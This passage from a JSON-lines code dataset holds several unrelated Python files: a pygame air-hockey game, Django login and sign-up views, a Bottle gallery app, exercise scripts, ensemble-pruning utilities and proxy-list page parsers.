up = pygame.key.get_pressed()[pygame.K_UP]\r\n down = pygame.key.get_pressed()[pygame.K_DOWN]\r\n right = pygame.key.get_pressed()[pygame.K_RIGHT]\r\n left = pygame.key.get_pressed()[pygame.K_LEFT]\r\n\r\n # Update Logic\r\n\r\n # Update Paddle1\r\n paddle1.y += (s - w) * paddleVelocity\r\n paddle1.x += (d - a) * paddleVelocity\r\n paddle1.checkTopBottomBounds(height)\r\n paddle1.checkLeftBoundary(width)\r\n\r\n # Update Paddle2\r\n paddle2.y += (down - up) * paddleVelocity\r\n paddle2.x += (right - left) * paddleVelocity\r\n paddle2.checkTopBottomBounds(height)\r\n paddle2.checkRightBoundary(width)\r\n\r\n # Update Puck\r\n puck.x += puck.velocity[0]\r\n puck.y += puck.velocity[1]\r\n if puck.x + puck.radius < 0:\r\n score2 += 1\r\n puck.serveDirection = -1\r\n puck.reset()\r\n elif puck.x - puck.radius > width:\r\n score1 += 1\r\n puck.serveDirection = 1\r\n puck.reset()\r\n if puck.collidesTopBottom(height):\r\n puck.velocity[1] *= -1\r\n if puck.collidesLeftRight(width):\r\n if(puck.y<((height / 2) - 90) or puck.y>((height / 2) + 90) ):\r\n print (\"true\")\r\n puck.velocity[0] *= -1\r\n\r\n\r\n if puck.collidesWithPaddle(paddle1):\r\n puck.x = paddle1.x + paddle1.radius + puck.radius\r\n puck.velocity[0] *= -1\r\n if puck.collidesWithPaddle(paddle2):\r\n puck.x = paddle2.x - paddle2.radius - puck.radius\r\n puck.velocity[0] *= -1\r\n\r\n # playing area should be drawn first\r\n renderPlayingArea()\r\n\r\n # drawing the paddle and the puck\r\n paddle1.draw(screen, (255, 0, 0))\r\n paddle2.draw(screen, (255, 255, 0))\r\n puck.draw(screen)\r\n score(score1,score2)\r\n\r\n pygame.display.flip()\r\n clock.tick(60)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n choice = airHockeyStart(screen, clock, width, height)\r\n if choice == 1:\r\n gameLoop(7)\r\n elif choice == 2:\r\n gameLoop(12)\r\n elif choice == 0:\r\n sys.exit()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"207494229","text":"n = int(input())\nwl = []\nwl.append(input())\nans = 'Yes'\nfor _ in range(1,n):\n w = input()\n if w in wl or wl[-1][-1] != w[0] or ans == 'No':\n ans = 'No'\n else:\n wl.append(w)\nprint(ans)","sub_path":"abc_py/abc109/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"279743779","text":"from django.core.context_processors import csrf\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect,HttpResponse\nfrom django.contrib import auth\nfrom CRP.crp.forms import *\nfrom CRP.crp.models import *\nfrom CRP import common\nimport logging\nimport random\nimport datetime\n\nlog = logging.getLogger(\"crp.views\")\n\ndef crp_404_view(request):\n data = {}\n return render_to_response('404.html',data,context_instance=RequestContext(request))\n\ndef crp_error_view(request):\n data = {}\n return render_to_response('500.html',data,context_instance=RequestContext(request))\n\ndef process_sign_out(request):\n \"\"\"\n This function is used to logout user successfully from the site.\n \"\"\"\n user=request.user\n auth.logout(request)\n try:\n request.session.flush()\n except:\n pass\n data = {}\n return render_to_response('home.html',data,context_instance=RequestContext(request))\n\ndef home(request):\n \"\"\"\n This function displays some information about bhagirath project, \n weekly and overall top users and provides login facility to the user. \n \"\"\"\n data = {}\n return render_to_response('home.html',data,context_instance=RequestContext(request))\n\ndef sort(request):\n site_user = request.user\n #Data access\n count = User.objects.filter(username=site_user).count()\n if count!=0:\n option1 = 'molly1'\n option2 = 'polly2'\n option3 = 'colly3'\n option4 = 'folly4'\n option5 = 'dolly5'\n form = SortForm()\n initialData = {'username':site_user,\n 'form': form,\n 'option1':option1,\n 'option2':option2,\n 'option3':option3,\n 'option4':option4,\n 'option5':option5,}\n csrfContext = RequestContext(request, initialData)\n return render_to_response('sort.html',csrfContext)\n else:\n data = {'form': LoginForm(),}\n return render_to_response('sign_in.html',data,context_instance=RequestContext(request))\n \ndef process_sort(request):\n user = request.user\n if user.is_authenticated():\n order = request.POST['sortlist']\n next = \"/sort/\"\n return HttpResponseRedirect(next) \n \n \ndef compare(request):\n is_present = False\n data = {'form':CompareForm(),'is_present':is_present}\n return render_to_response('compare.html',data,context_instance=RequestContext(request))\n \ndef process_compare(request):\n list_word_1 = request.POST.pop('word_1')\n word_1 = ''.join(list_word_1)\n list_word_2 = request.POST.pop('word_2')\n word_2 = ''.join(list_word_2)\n c = Compare()\n c.word_1 = word_1\n c.word_2 = word_2\n #similarity calculation\n c.similarity_score = 0\n score = 0\n is_present = True\n c.save()\n data = {'word_1':word_1, 'word_2':word_2, 'score':score, 'is_present':is_present}\n next = \"/compare/\"\n return render_to_response('compare.html',data,context_instance=RequestContext(request))\n\ndef contact_us(request):\n user = request.user\n logged_in = False\n email_id = \"\"\n form = ContactUsForm()\n data = {'email_id':email_id,'username':user, 'logged_in':logged_in,'form':form }\n return render_to_response('contact_us.html',data,context_instance=RequestContext(request))\n\ndef process_contact_us(request):\n c = request.POST.pop('comment')\n e = request.POST.pop('email')\n try:\n a = Feedback()\n if request.POST.has_key('feedback_suggestion'):\n a.type = \"suggestion\"\n if c[0] and e[0]:\n a.comment = c[0]\n a.email = e[0]\n a.save()\n else:\n log.error(\"All fields not entered correctly while user feedback.\")\n \n elif request.POST.has_key('feedback_collaboration'):\n a.type = \"collaboration\"\n if c[1] and e[1]:\n a.comment = c[1]\n a.email = e[1]\n a.save()\n else:\n log.error(\"All fields not entered correctly while user feedback.\")\n \n elif request.POST.has_key('feedback_copyright_issues'):\n a.type = \"copyright_issue\"\n if c[2] and e[2]:\n a.comment = c[2]\n a.email = e[2]\n a.save()\n else:\n log.error(\"All fields not entered correctly while user feedback.\")\n except:\n log.exception(\"Save user feedback failed for %s.\"%(request.POST['email']))\n next = \"/contact_us/\"\n return HttpResponseRedirect(next) \n\n\ndef sign_up(request):\n \"\"\"\n This function loads sign up form for new user's registration. \n \"\"\"\n data = { 'form': SignUpForm() }\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n \ndef process_sign_up(request):\n \"\"\"\nThis function is used to process information provided by user while registration.\nIt performs several checks over the data entered by user like the entered recaptcha,\npassword as well as confirmed password, unique username and email-id. If all entries\nare valid and all checks are passed it registers the user by creating a record in User and UserProfile models.\n\"\"\"\n user = request.user\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n f_username = form.cleaned_data['username']\n f_password = form.cleaned_data['password']\n f_email = form.cleaned_data['email']\n \n try:\n count = 0\n #Check for unique email-id\n count = User.objects.filter(email=f_email).count()\n if count !=0:\n data = {'form': SignUpForm(request.POST)}\n log.error(\"Exisiting email-id used while user-registration.\")\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n \n #Check for unique username\n count = User.objects.all().filter(username = f_username).count()\n if count != 0:\n data = {'form': SignUpForm(request.POST)}\n log.error(\"Exisiting username used while user-registration.\")\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n \n u = User.objects.create_user(f_username, f_email, f_password)\n u.is_active = True\n u.set_password(f_password)\n u.save()\n user = User.objects.get(username__exact=f_username)\n p = User_Profile()\n p.user = user\n p.user_creation_timestamp = datetime.datetime.now()\n p.date_of_birth = datetime.datetime.now()\n p.state_province = 'Maharashtra'\n try:\n p.ip_address = request.META['HTTP_X_FORWARDED_FOR']\n except:\n p.ip_address = request.META['REMOTE_ADDR']\n p.save()\n next = \"/sign_in/\"\n return HttpResponseRedirect(next) \n except:\n data = {'form': SignUpForm()}\n log.exception(\"User registration failed for %s.\"%(f_username))\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n else:\n data = {'form': SignUpForm(request.POST)}\n log.error(\"All fields not entered correctly while user registration.\")\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n \ndef sign_in(request):\n \"\"\"\n This function loads sign form for user's login. \n \"\"\"\n data = {'form': LoginForm(),}\n return render_to_response('sign_in.html',data,context_instance=RequestContext(request))\n\ndef process_sign_in(request):\n \"\"\"\n This function authenticates the user with username and password provided \n by him and allows login if and only if the user is active.\n \"\"\"\n uname = request.POST['username']\n passwd = request.POST['password']\n user = auth.authenticate(username=uname, password=passwd)\n if user is not None and user.is_active:\n auth.login(request, user)\n next = \"/sort/\"\n return HttpResponseRedirect(next) \n else:\n log.error(\"Login failed for user: %s.\"%(uname))\n data = {'form': LoginForm(),}\n return render_to_response('sign_in.html',data,context_instance=RequestContext(request))\n","sub_path":"CRP/crp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"627861211","text":"from bottle import Bottle, request\n\nfrom datafly.core import template\nfrom datafly.utils.editor import slugify\n\nfrom config import db\n\n# PUBLIC\n\npublic_app = Bottle()\n\n@public_app.get('/gallery/')\ndef view_gallery(id): \n gallery = db.galleries.find_one({ 'id': id })\n return template('gallery.html', gallery=gallery)\n\n# ADMIN\n\nadmin_app = Bottle()\n\n@admin_app.get('/admin/gallery/')\ndef manage_gallery(id):\n template_context = dict(\n gallery = db.galleries.find_one({ 'id': id }),\n id=id,\n size=admin_app.config['size']\n )\n return template('admin/gallery.html', **template_context) \n\n@admin_app.post('/admin/api/gallery')\ndef save_gallery():\n data = request.json['data']\n data['id'] = slugify(data['title']) if data['id'] == 'new' else data['id']\n db.galleries.update({ 'id': data['id'] }, data, upsert=True)\n return { 'id': data['id'] } ","sub_path":"www/datafly/views/gallery.py","file_name":"gallery.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"252573082","text":"import random \r\n\r\nnofchoices = input(\"Enter amount of choices.\\n\")\r\n\r\nchoices = []\r\nfor i in range(0,int(nofchoices)):\r\n c = input(f'Choice {i+1} is ')\r\n\r\n choices.append(c)\r\n\r\nprint(random.choice(choices))","sub_path":"chooseforme.py","file_name":"chooseforme.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"16408096","text":"#!/usr/bin/env python\nimport sys\nsys.path.append('../../py')\n\nfrom pylab import *\nfrom gsim import *\n\ndata, desc = gs('451_circ.sch')\n\nvname = desc['varnames']\nvunit = desc['varunits']\n\nt = data['time']*1e3\nvout = data['v(out)']\n\nplot(t,vout, 'r', label='DT')\nxlabel('Time [ms]')\nylabel('Voltage [V]')\nxlim(0, t[-1])\ngrid()\nsavefig('451_img.png')\n#show()\n\n","sub_path":"demo-ngspice/450_spice_signal/451_prg.py","file_name":"451_prg.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"78070588","text":"#!virtual_env/bin/python3\n\n# **************************************************************************** #\n# #\n# ::: :::::::: #\n# logreg_predict.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: eduriez +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/08/06 17:50:06 by eduriez #+# #+# #\n# Updated: 2020/08/06 17:50:06 by eduriez ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport pandas as pd\nimport sys\nfrom DSLR_maths.logistic_regression import test_model\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage : ./logreg_predict.py datasets/dataset_test.csv datasets/weights.csv \", file=sys.stderr)\n else:\n try:\n columns_dataset = [\n \"Astronomy\",\n \"Muggle Studies\",\n \"Ancient Runes\",\n \"Transfiguration\",\n \"Flying\"\n ]\n dataset_test = pd.read_csv(sys.argv[1])[columns_dataset]\n weights = pd.read_csv(sys.argv[2])\n predicts = test_model(dataset_test, columns_dataset, weights)\n predicts.to_csv(\"datasets/houses.csv\", index=False)\n except Exception as e:\n print(e, file=sys.stderr)\n","sub_path":"Algorithmic_branch/DSLR/logreg_predict.py","file_name":"logreg_predict.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"537751085","text":"#Hannah Lerner\n#hlerner@bu.edu\n\nfrom ps4pr1 import *\n\n\n#1\n\ndef add(s1,s2):\n '''adds the two binary numbers by converting them to base 10 for the math then converting back'''\n x = bin_to_dec(s1)\n y = bin_to_dec(s2)\n z = dec_to_bin(x+y)\n return z\n\n#2\n\ndef add_bitwise(s1,s2):\n ''' recursively adds the two binary numbers together'''\n if s1 == '' and s2 == '':\n return ''\n elif s1 == '':\n return s2\n elif s2 == '':\n return s1\n else:\n rest = add_bitwise(s1[:-1],s2[:-1])\n if s1[-1] == '1' and s2[-1] == '1':\n return add_bitwise(rest,'1') + '0'\n if s1[-1] == '0' and s2[-1] == '1':\n return rest + '1'\n if s1[-1] == '1' and s2[-1] == '0':\n return rest + '1'\n if s1[-1] == '0' and s2[-1] == '0':\n return rest + '0'\n","sub_path":"Semester 1/Problem Sets/ps4pr2.py","file_name":"ps4pr2.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"104189599","text":"\"\"\"\n 练习1:\n 在list_helper.py中增加通用的求和方法.\n 案例1:计算敌人列表中所有敌人的总血量.\n 案例2:计算敌人列表中所有敌人的总攻击力.\n 案例3:计算敌人列表中所有敌人的总防御力.\n 步骤:\n 实现具体功能/提取变化/提取不变/组合\n\n 练习2:\n 在list_helper.py中增加通用的筛选方法.\n 案例1:获取敌人列表中所有敌人的名称.\n 案例2:计算敌人列表中所有敌人的攻击力.\n 案例3:计算敌人列表中所有敌人的名称和血量.\n\n 练习3:\n 在list_helper.py中增加通用的获取最大值方法.\n 案例1:获取敌人列表中攻击力最大的敌人.\n 案例2:获取敌人列表中防御力最大的敌人.\n 案例3:获取敌人列表中血量最高的敌人.\n\n 练习4:\n 在list_helper.py中增加通用的升序排列方法.\n 案例1:将敌人列表按照攻击力进行升序排列.\n 案例2:将敌人列表按照防御力进行升序排列.\n 案例3:将敌人列表按照血量进行升序排列.\n\"\"\"\nfrom common.list_helper import *\n\n\nclass Enemy:\n def __init__(self, name, hp, atk, defense):\n self.name = name\n self.hp = hp\n self.atk = atk\n self.defense = defense\n\n def __str__(self):\n return \"%s--%d--%d--%d\" % (self.name, self.hp, self.atk, self.defense)\n\n\nlist01 = [\n Enemy(\"玄冥二老\", 86, 120, 58),\n Enemy(\"成昆\", 0, 100, 5),\n Enemy(\"谢逊\", 120, 130, 60),\n Enemy(\"灭霸\", 0, 1309, 690),\n]\n\n# 练习1:\n\"\"\"\n# 实现具体功能......\ndef sum01():\n sum_value = 0\n for item in list01:\n sum_value += item.atk\n return sum_value\n\ndef sum02():\n sum_value = 0\n for item in list01:\n sum_value += item.hp\n return sum_value\n\ndef sum03():\n sum_value = 0\n for item in list01:\n sum_value += item.defense\n return sum_value\n\n# 提取变化.....\ndef handle01(item):\n return item.atk\n\ndef handle02(item):\n return item.hp\n\ndef handle03(item):\n return item.defense\n\n# 提取不变....\ndef sum(func_handle):\n sum_value = 0\n for item in list01:\n # sum_value += item.defense\n # sum_value += handle03(item)\n sum_value += func_handle(item)\n return sum_value\n\nprint(sum(handle03))\n\"\"\"\nprint(ListHelper.sum(list01, lambda item: item.atk))\n\n# 练习2:\n\"\"\"\ndef select01():\n result = []\n for item in list01:\n result.append(item.name)\n return result\n\ndef select02():\n result = []\n for item in list01:\n result.append(item.atk)\n return result\n\ndef select03():\n result = []\n for item in list01:\n result.append((item.name,item.hp))\n return result\n\ndef handle01(item):\n return item.name\n\ndef handle02(item):\n return item.atk\n\ndef handle03(item):\n return (item.name,item.hp)\n\n# def select(func_handle):\n# result = []\n# for item in list01:\n# # result.append((item.name,item.hp))\n# # result.append(handle03(item))\n# result.append(func_handle(item))\n# return result\n\ndef select(func_handle):\n for item in list01:\n yield func_handle(item)\n\nfor item in select(handle01):\n print(item)\n\"\"\"\nfor item in ListHelper.select(list01, lambda item: (item.name, item.hp)):\n print(item)\n\n# 练习3:\n\"\"\"\ndef get_max01():\n max_value = list01[0]\n for i in range(1, len(list01)):\n if max_value.atk < list01[i].atk:\n max_value = list01[i]\n return max_value\n\n\ndef get_max02():\n max_value = list01[0]\n for i in range(1, len(list01)):\n if max_value.defense < list01[i].defense:\n max_value = list01[i]\n return max_value\n\n\ndef get_max03():\n max_value = list01[0]\n for i in range(1, len(list01)):\n if max_value.hp < list01[i].hp:\n max_value = list01[i]\n return max_value\n\n\ndef handle01(item):\n return item.atk\n\n\ndef handle02(item):\n return item.defense\n\n\ndef handle03(item):\n return item.hp\n\n\ndef get_max(func_handle):\n max_value = list01[0]\n for i in range(1, len(list01)):\n # if max_value.hp < list01[i].hp:\n # if handle03(max_value) < handle03(list01[i]):\n if func_handle(max_value) < func_handle(list01[i]):\n max_value = list01[i]\n return max_value\n\nprint(get_max(handle02))\n\"\"\"\nprint(ListHelper.get_max(list01, lambda item: item.atk))\n\n# 练习4:\n\"\"\"\ndef order_by01():\n # 取出前几个数据\n for r in range(len(list01) - 1):\n # 与后面进行对比\n for c in range(r + 1, len(list01)):\n if list01[r].atk > list01[c].atk:\n list01[r], list01[c] = list01[c], list01[r]\n\ndef order_by02():\n for r in range(len(list01) - 1):\n for c in range(r + 1, len(list01)):\n if list01[r].defense > list01[c].defense:\n list01[r], list01[c] = list01[c], list01[r]\n\ndef order_by03():\n for r in range(len(list01) - 1):\n for c in range(r + 1, len(list01)):\n if list01[r].hp > list01[c].hp:\n list01[r], list01[c] = list01[c], list01[r]\n\ndef handle01(item):\n return item.hp\ndef handle02(item):\n return item.defense\ndef handle03(item):\n return item.atk\n\ndef order_by(func_handle):\n for r in range(len(list01) - 1):\n for c in range(r + 1, len(list01)):\n # if list01[r].hp > list01[c].hp:\n # if handle03(list01[r]) > handle03(list01[c]):\n if func_handle(list01[r]) > func_handle(list01[c]):\n list01[r], list01[c] = list01[c], list01[r]\n\norder_by(handle01)\n\nfor item in list01:\n print(item)\n\"\"\"\nListHelper.order_by(list01, lambda item: item.hp)\nfor item in list01:\n print(item)\n# 15:20\n","sub_path":"python_one_learn/day18/exercise02.py","file_name":"exercise02.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"512511580","text":"import numpy as np\nfrom Script.metrics.evaluation import _recall, _gm, _sar, _auc\nfrom sklearn.metrics import cohen_kappa_score\nimport warnings\nimport inspect\n\n\ndef name_and_args():\n caller = inspect.stack()[1][0]\n args, _, _, values = inspect.getargvalues(caller)\n return [(i, values[i]) for i in args]\n\n\ndef direct_select(true_y, select, candidates, votes, clsWeight, cnt_votes, prob, func):\n \"\"\"Description\n Parameter\n ---------------------------------------------------------------\n candidates: indices of all remaining classifiers\n select: indices of selected classifiers in current ensemble\n votes: 2d-array with rows representing each instance, columns representing each classifier [-x,x]\n cnt_votes_: 2d np array of shape [N, 2] recording total weights for majority/minority classes\\\n clsWeight: 1d-array indicating weight of each classifiers (M, )\n prob: whether calculation is based on probability or actual vote\n ===============================================================\n update_vote returns weighted votes after adding a weighted classifier (dynamic programming)\n in current version, we haven't included balance feature into the design of direct search as \n well as kappa diversity search. \n \"\"\"\n def getensemblevote(array):\n # array is 1d np of shape N_instance, each is a weighted vote of candidate classifier\n # return 2d array of shape [N, 2] representing neg weight, pos weight \n cnt = cnt_votes.copy()\n neg_filter = array <= 0; pos_filter = ~neg_filter\n cnt[neg_filter, 0] += -array[neg_filter]\n cnt[pos_filter, 1] += array[pos_filter]\n return cnt\n def get_score(array):\n return func(true_y, array)\n # ------------------------------------------------------------------------ #\n res = np.array(list(map(getensemblevote, votes[:, candidates].T)))\n update_vote, pred_prob = res[:,:,:2], res[:,:,1]/res[:,:,:2].sum(axis=2)\n if not prob:\n pred_prob = (pred_prob > 0.5).astype(int)\n scores = np.array(list(map(get_score, pred_prob)))\n best = scores.argmax()\n candidate, cnt_vote, score = candidates[best], update_vote[best], scores[best]\n return candidate, cnt_vote, clsWeight, score \n\ndef select_candidate_by_kappa(**args):\n \"\"\"Description\n kappa = difference between observed and expected agreemenet\n Cohen(1960s) pointed out some agreement comes from merely guessing\n kappa is ranged from -1 to +1; 1 means perfect agreement without \n guessing at all where as ≤ 0 as indicating no agreement\n \"\"\"\n args.update({'prob': False, 'func': cohen_kappa_score})\n return direct_select(**args)\n\ndef select_candidate_by_sar(**args):\n args.update({'func': _sar})\n return direct_select(**args)\n\ndef select_candidate_by_gm(**args):\n args.update({'func': _gm})\n return direct_select(**args)\n\ndef select_candidate_by_recall(**args):\n args.update({'func': _recall})\n return direct_select(**args)\n\ndef select_candidate_by_auc(**args):\n args.update({'func': _auc})\n return direct_select(**args)\n\n\ndef get_probability(matrix, enforcer=0.0):\n \"\"\"calcuate total votes for +1 and -1 then calculate proportion\n Parameter\n ---\n array is an array of -x and +x if vote is false\n \"\"\"\n def helper(array):\n abSum = np.abs(array).sum()+enforcer\n return sum(array[array>0])/abSum\n return np.array(list(map(helper, matrix)))\n\n\n# def get_probability_by_count(matrix, enforcer=0.0):\n# \"\"\"matrix of zero-one\"\"\"\n# def helper(array):\n# pos = sum(array==1)\n# return pos/(len(array)+)\n# if len(count) == 1:\n# return 0.0\n# else:\n# return count[1] / (count[0] + count[1])\n# return np.array(list(map(helper, matrix)))\n\n# def select_candidate_by_cap(true_y, select, candidates, votes, Kmm, Kcm):\n# \"\"\"Descriptiobn\n# CAP score too time consuming, abandon this method\n# \"\"\"\n# Ns = len(select)\n# res = []\n# for candidate in candidates:\n\n# # 1) create temporary memory of following important variables\n# _selects = votes[:, select]\n# _candidate = votes[:, candidate]\n\n# # 2) dynamic programming: update Kmm and Kcm accordingly\n# if Ns == 1: # the 2nd round when ensemble includes one classifier only\n# Kmm = cohen_kappa_score(_selects, _candidate)\n# Kcm = (cohen_kappa_score(_selects, true_y) +\n# cohen_kappa_score(_candidate, true_y)) / 2\n# else: # update m-m and c-m scores dynamically\n# Kmm = (Kmm * Ns + sum(map(lambda x: cohen_kappa_score(x,\n# _candidate), _selects.T))) / (Ns + 1)\n# Kcm = (Kcm * Ns + cohen_kappa_score(_candidate, true_y)) / (Ns + 1)\n\n# # 3) calculate merit score for this candidate\n# merits = Ns * Kcm / np.sqrt(Ns + Ns * (Ns - 1) * Kmm)\n# res.append(merits)\n# return candidates[np.array(res).argmax()], Kmm, Kcm\n\n\ndef heuristic_select(true_y, select, candidates, votes, clsWeight, insWeight, balance, heuristic, enforcer):\n \"\"\"Description\n Parameter\n ---------------------------------------------------------------\n insWeight: (N, ) shape array\n clsWeight: (M, ) in current version classifier weight doens't play a role in boosting algorithm !!\n ===============================================================\n Return\n ---------------------------------------------------------------\n best candidate and new updated instance weight, possibly new classifier weight (update in the future)\n ===============================================================\n Special Notification\n ---------------------------------------------------------------\n For boosting based pruning: classifier weight doesn't make any difference in selection\n \"\"\"\n def get_weighted_score(array):\n # array := candidate weighted vote on all instances\n if heuristic == 'boost':\n return sum(-weight * ((array>0).astype(int) != true_y)) \n else:\n return sum(weight * (2 * ((array>0).astype(int) == true_y) - 1))\n #---------------------------------------------------------------------------#\n # Boosting based pruning #\n def update_by_boost(select_candidate, _insWeight):\n correct_filter = (votes[:, select_candidate] > 0.5).astype(int) == true_y\n incorrect_filter = ~correct_filter\n error = len(incorrect_filter)/N\n if error > 0.5:\n _insWeight = np.array([1 / N] * N)\n else:\n if error == 0.0: error = 0.01 # avoid inf weight\n if error == 1.0: error = 0.99 # avoid 0.0 weight\n _insWeight[correct_filter] /= (2 * (1 - error))\n _insWeight[incorrect_filter] /= (2 * error)\n return normal(_insWeight)\n #---------------------------------------------------------------------------#\n # Uncertainty Weighted Accuracy based pruning #\n def update_by_uwa(select_candidate, _insWeight):\n pred_prob = get_probability(votes[:, select + [select_candidate]])\n return normal(np.minimum(pred_prob, 1 - pred_prob))\n #---------------------------------------------------------------------------#\n # Difficulty Weighted Accuracy based pruning #\n def update_by_dwa(select_candidate, _insWeight):\n pred_prob = get_probability(votes[:, select + [select_candidate]])\n correct = true_y == (pred_prob > 0.5).astype(int)\n pred_prob[correct] = np.minimum(pred_prob[correct], 1 - pred_prob[correct])\n pred_prob[~correct] = np.maximum(pred_prob[~correct], 1 - pred_prob[~correct])\n return normal(pred_prob)\n #---------------------------------------------------------------------------#\n # Uncertainty & Difficulty Weighted Accuracy based pruning #\n def update_by_udwa(select_candidate, _insWeight):\n pred_prob = get_probability(votes[:, select + [select_candidate]])\n # ----- weighted by difficulty when instance is minority class -------- #\n flag = true_y == (pred_prob > 0.5).astype(int) & (true_y == 1)\n pred_prob[~flag] = np.minimum(pred_prob[~flag], 1 - pred_prob[~flag])\n pred_prob[flag] = np.maximum(pred_prob[flag], 1 - pred_prob[flag])\n return normal(pred_prob)\n #---------------------------------------------------------------------------#\n # Uncertainty & Difficulty Weighted Accuracy based pruning + System Bias#\n def update_by_udwa_enf(select_candidate, _insWeight):\n pred_prob = get_probability(votes[:, select + [select_candidate]],enforcer)\n # ----- weighted by difficulty when instance is minority class -------- #\n flag = true_y == (pred_prob > 0.5).astype(int) & (true_y == 1)\n pred_prob[~flag] = np.minimum(pred_prob[~flag], 1 - pred_prob[~flag])\n pred_prob[flag] = np.maximum(pred_prob[flag], 1 - pred_prob[flag])\n return normal(pred_prob)\n #############################################################################\n # 1) to balance the importance of majority/minority bias\n if balance:\n tmpWeight = insWeight.copy()\n major = true_y == 0; minor = ~major\n tmpWeight[major] = normal(tmpWeight[major])/2\n tmpWeight[minor] = normal(tmpWeight[minor])/2\n #############################################################################\n # 2) update instance weight \n N = len(true_y) # how many instances in total\n candidate = select[-1] # added classifier in the last round\n insWeight = eval('update_by_' + heuristic + '(candidate, insWeight)')\n # 2) to balance the importance of majority/minority bias\n #############################################################################\n if balance:\n tmpWeight = insWeight.copy()\n major = true_y == 0; minor = ~major\n tmpWeight[major] = normal(tmpWeight[major])/2\n tmpWeight[minor] = normal(tmpWeight[minor])/2\n weight = tmpWeight if balance else insWeight\n #############################################################################\n # 3) select best candidate classifier\n scores = np.array(list(map(get_weighted_score, votes[:, candidates].T)))\n best = scores.argmax()\n candidate, score = candidates[best], scores[best]\n #############################################################################\n return candidates[best], insWeight, clsWeight\n\n\n\ndef normal(array):\n Sum = sum(array)\n if Sum == 0:\n return np.zeros(len(array))\n else:\n return array / Sum","sub_path":"Script/pruning/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"622054716","text":"from django.db import models\n\nTIPO_ACTIVIDAD = (\n ('R', 'Rutinaria'),\n ('NR', 'No Rutinaria'),\n ('PALT', 'Personal con Acceso al Lugar de Trabajo')\n)\n\n\nclass TipoActividad(models.Model):\n descripcion = models.CharField(max_length=100, db_index=True, choices=TIPO_ACTIVIDAD)\n\n class Meta:\n verbose_name = 'TipoActividad'\n verbose_name_plural = 'TipoActividads'\n\n def __str__(self):\n return self.get_descripcion_display()\n","sub_path":"tipo_actividad/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"432870153","text":"#!/usr/bin/env python\n\nimport pickle\n\n# define the class before unpickle\nclass Bird(object):\n have_feather = True\n way_of_reproduction = 'egg'\n\nfn = 'a.pkl'\nwith open(fn, 'r') as f:\n summer = pickle.load(f)\t# rename file and build object`\n","sub_path":"pickleRelod.py","file_name":"pickleRelod.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"481105175","text":"import logging\nfrom enum import Enum\nfrom async_web_scrapper import GenericPage, PageResult\nfrom async_web_scrapper.proxy.proxy_types import *\n\n\nclass PageEnum(Enum):\n SOCKS = 0\n HTTPS = 1\n ANON = 2\n UK = 3\n US = 4\n\n\nclass _ProxyPage:\n async def parse_entries(self):\n html = await self.retriever.retrieve_html(self.url, failsafe=True)\n return map(\n lambda x: list(map(lambda y: y.text.strip(), x.find_all('td'))), \n html.find('table').find('tbody').find_all('tr')\n )\n\n\nclass SOCKSPage(GenericPage, _ProxyPage):\n async def process(self):\n logging.info('Parsing page with SOCKS proxies')\n entries = await self.parse_entries()\n return PageResult(\n items=list(map(lambda x: SOCKS4Proxy(*x[:3]) if x[4].lower() == 'socks4' else SOCKS5Proxy(*x[:3]), entries))\n )\n\n\nclass HTTPSPage(GenericPage, _ProxyPage):\n async def process(self):\n logging.info('Parsing page with HTTPS proxies')\n entries = await self.parse_entries()\n return PageResult(\n items=list(map(lambda x: HTTPSProxy(*x[:3]), entries))\n )\n\n\nclass AnonPage(GenericPage, _ProxyPage):\n async def process(self):\n logging.info('Parsing page with anonymous proxies')\n entries = await self.parse_entries()\n return PageResult(\n items=list(map(lambda x: HTTPSProxy(*x[:3]) if x[6].lower() == 'yes' else HTTPProxy(*x[:3]), entries))\n )\n\n\nclass UKPage(AnonPage):\n pass\n\n\nclass USPage(AnonPage):\n pass\n","sub_path":"free_proxies/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"215571950","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n# 